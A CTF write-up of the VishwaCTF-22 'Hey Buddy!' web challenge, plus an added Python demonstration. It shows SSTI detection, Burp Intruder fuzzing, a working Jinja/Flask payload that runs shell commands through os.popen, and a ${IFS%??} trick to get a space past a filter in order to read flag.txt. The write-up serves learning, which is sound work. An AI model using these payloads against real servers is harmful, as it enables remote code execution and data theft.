VishwaCTF-22 => “Hey Buddy!” (Web)

Challenge Info

Description: Hey Buddy, Give me your name I will display your name on my website. Yes exactly, there is nothing in this website.

URL: https://h3y-buddy.vishwactf.com/

Vishwa CTF

Solution

The challenge says that when you enter your name it will simply display it on the site. Fine. But what is the backend doing with the name once we submit it: passing it to a shell script? Maybe, maybe not. Let's find out. Whatever name we enter, it always comes back in the same fixed format, which suggests it is being substituted into a template. So the vulnerability class to check for is template injection, and since the substitution happens on the server, specifically SSTI (Server-Side Template Injection). The basic test is to submit {{7*7}}: if the template engine evaluates the expression, the page displays 49 instead of the literal text. So,

And here it worked. Next I tried to automate it with tplmap, an SSTI exploitation tool, but it did not seem to work for me. So I downloaded an SSTI payload list from GitHub and fed it to Burp Intruder. Many payloads produced a 500 error, so I filtered out all the 3xx, 4xx and 5xx responses and was left with a few:-

But the most useful one I found was:-

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

This ran "ls" on the server's filesystem and listed the files; the one I was interested in was flag.txt. I then tried the command "cat flag.txt", but got a 500 error. So I replaced the space (" ") with "${IFS%??}". This works because os.popen() hands the command to /bin/sh, where IFS defaults to space, tab and newline, and the %?? strips the last two characters, leaving a single space. So the final payload was:-

{{config.__class__.__init__.__globals__['os'].popen('cat${IFS%??}flag.txt').read()}}
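To make the two moving parts of this payload concrete, here is an added example (not code from the challenge or from the original writeup) that reproduces them locally with only the Python standard library. It covers both the gadget chain from the "ls" payload and the "${IFS%??}" trick above. The Config class is a stand-in for Flask's config object (an assumption: the real one lives in flask.config, a module that also imports os); the flag content is constructed, and the command is run in a temporary directory.

```python
import os
import subprocess
import tempfile


class Config:
    """Stand-in for Flask's Config object (assumption: the real class is
    flask.config.Config, defined in a module that imports os). Any class
    with a Python-level __init__ behaves the same way for the gadget."""

    def __init__(self):
        self.DEBUG = False


def os_module_via_gadget(obj):
    """Walk the same attribute chain the payload uses, starting from any object.

    obj.__class__.__init__.__globals__ is the global namespace of the module
    that defined the class's __init__, so it contains every module that file
    imported. Here that is this script's globals, which include os.
    """
    module_globals = obj.__class__.__init__.__globals__
    return module_globals.get("os")


def ifs_expansion():
    """Return what ${IFS%??} expands to under /bin/sh.

    os.popen() runs its command through `sh -c`. In sh, IFS defaults to
    <space><tab><newline>; the %?? suffix strip removes the last two
    characters, leaving exactly one space.
    """
    result = subprocess.run(
        ["/bin/sh", "-c", 'printf "%s" "${IFS%??}"'],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def read_flag_without_spaces(flag_text="vishwaCTF{constructed_sample_flag}"):
    """Run the writeup's final command through os.popen against a constructed flag.txt.

    The command string contains no literal space, yet sh still parses it as
    `cat flag.txt` because ${IFS%??} is expanded before word splitting.
    """
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "flag.txt"), "w") as fh:
            fh.write(flag_text)
        previous = os.getcwd()
        os.chdir(workdir)
        try:
            os_mod = os_module_via_gadget(Config())  # same lookup as the payload
            return os_mod.popen("cat${IFS%??}flag.txt").read()
        finally:
            os.chdir(previous)


if __name__ == "__main__":
    print("IFS trick expands to:", repr(ifs_expansion()))
    print("gadget resolved module:", os_module_via_gadget(Config()).__name__)
    print("command output:", read_flag_without_spaces())
```

The writeup only observes that the request with a literal space returned a 500; it does not show why. Whatever the cause, the point of the trick is that the filtering happened in the application, while the expansion happens later in the shell that os.popen() spawns, so the shell still sees a normal two-word command.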

This finally gave me the flag:-

Takeaways

  • If a payload fails because of the space character (" "), replace the space with "${IFS%??}"; the shell expands it to a single space.
  • If one payload for an attack does not work, try others.

Get more VishwaCTF-22 writeups here
